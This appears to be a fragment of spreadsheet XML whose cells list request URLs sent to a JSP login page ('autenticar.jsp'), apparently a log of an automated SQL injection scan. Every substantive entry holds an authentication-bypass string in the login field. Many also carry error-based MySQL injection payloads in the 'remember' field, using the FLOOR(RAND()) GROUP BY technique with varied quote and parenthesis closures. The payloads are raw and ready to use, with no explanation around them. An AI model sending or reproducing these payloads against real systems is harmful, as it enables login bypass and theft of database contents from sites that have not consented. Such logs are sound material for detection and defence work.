    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3748')or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-367&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7943'or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3062&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3680"or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5144&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4062)or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(3722=3722&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7612&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4221))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((7571=7571&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1415&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4725)))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(((8250=8250&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6254&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3542or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-374&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4040')or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('lmra'='lmra&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3553&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8556'))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('aund'='aund&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4799&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-260')))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('kcbk'='kcbk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7457&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7492'or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'kzqc'='kzqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-399&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1051')or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('wboc'like'wboc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3068&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8120'))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('vrzu'like'vrzu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-671&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4958')))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('zdiy'like'zdiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9552&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6339'or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'khub'like'khub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-232&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6298")or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("cxvz"="cxvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8737&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9502"))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("gfuq"="gfuq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6963&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-90")))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("zdrw"="zdrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9370&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4926"or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"mwge"="mwge&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2511&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9190")or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("iimm"like"iimm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5120&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3912"))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("owbf"like"owbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5058&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5866")))or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("geer"like"geer&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5770&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2409"or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"bedu"like"bedu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8933&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7423)orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3487&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6178')orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9974&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8076'orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1838&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1981"orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7672&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3204)orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(1605=1605&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8572&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1722))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and((2827=2827&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9278&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9613)))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(((4647=4647&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-783&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5822orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1599&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2286')orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and('jdnp'='jdnp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5995&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7372'))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(('fcxo'='fcxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4437&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-846')))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and((('lhhc'='lhhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3595'orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and'rswx'='rswx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7086&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6599')orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and('kgpm'like'kgpm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8108&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6855'))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(('ovla'like'ovla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7818&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1296')))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and((('fbgl'like'fbgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-657&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4498'orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and'sasu'like'sasu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6843&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9642")orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and("lfjw"="lfjw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7804&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5746"))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(("lasr"="lasr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8218&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6406")))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and((("wizu"="wizu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8335&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1455"orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and"flgl"="flgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-290&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3467")orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and("tiby"like"tiby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9377&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-149"))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and(("knit"like"knit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1218&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9076")))orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and((("vsai"like"vsai&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9408&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4519"orrow(4767,3017)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(4767=4767)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select4767unionselect3017)agroupbyxlimit1)and"ccqq"like"ccqq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8822&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1587)or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-370&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2487')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3251&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1342'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7987&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5266"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-849&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6993)or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(2560=2560&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6045&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6021))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((137=137&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1820&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6362)))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(((1995=1995&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4763&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6713or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7523&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9357')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and('ubit'='ubit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6689&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3343'))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(('xaom'='xaom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3560&amp;modo=entrar</t>
  </si>
  <si>
